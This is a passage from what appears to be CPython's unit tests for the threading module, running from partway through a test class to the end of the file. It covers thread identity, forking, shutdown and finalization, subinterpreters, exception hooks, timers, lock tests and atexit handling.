self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
support.wait_process(pid, exitcode=10)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
from test import support
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
support.wait_process(pid, exitcode=0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
from test import support
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
support.wait_process(pid, exitcode=0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=support.SHORT_TIMEOUT), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
def test_locals_at_exit(self):
# bpo-19466: thread locals must not be deleted before destructors
# are called
rc, out, err = assert_python_ok("-c", """if 1:
import threading
class Atexit:
def __del__(self):
print("thread_dict.atexit = %r" % thread_dict.atexit)
thread_dict = threading.local()
thread_dict.atexit = "value"
atexit = Atexit()
""")
self.assertEqual(out.rstrip(), b"thread_dict.atexit = 'value'")
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
from test import support
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
from test import support
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
support.wait_process(pid, exitcode=50)
else:
os._exit(50)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(51)
else:
os._exit(52)
else:
support.wait_process(pid, exitcode=51)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def pipe(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
if hasattr(os, 'set_blocking'):
os.set_blocking(r, False)
return (r, w)
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = f"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep({test.support.SHORT_TIMEOUT})
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
class AtexitTests(unittest.TestCase):
def test_atexit_output(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
def run_last():
print('parrot')
threading._register_atexit(run_last)
""")
self.assertFalse(err)
self.assertEqual(out.strip(), b'parrot')
def test_atexit_called_once(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
from unittest.mock import Mock
mock = Mock()
threading._register_atexit(mock)
mock.assert_not_called()
# force early shutdown to ensure it was called once
threading._shutdown()
mock.assert_called_once()
""")
self.assertFalse(err)
def test_atexit_after_shutdown(self):
# The only way to do this is by registering an atexit within
# an atexit, which is intended to raise an exception.
rc, out, err = assert_python_ok("-c", """if True:
import threading
def func():
pass
def run_last():
threading._register_atexit(func)
threading._register_atexit(run_last)
""")
self.assertTrue(err)
self.assertIn("RuntimeError: can't register atexit after shutdown",
err.decode())
if __name__ == "__main__":
unittest.main()
|
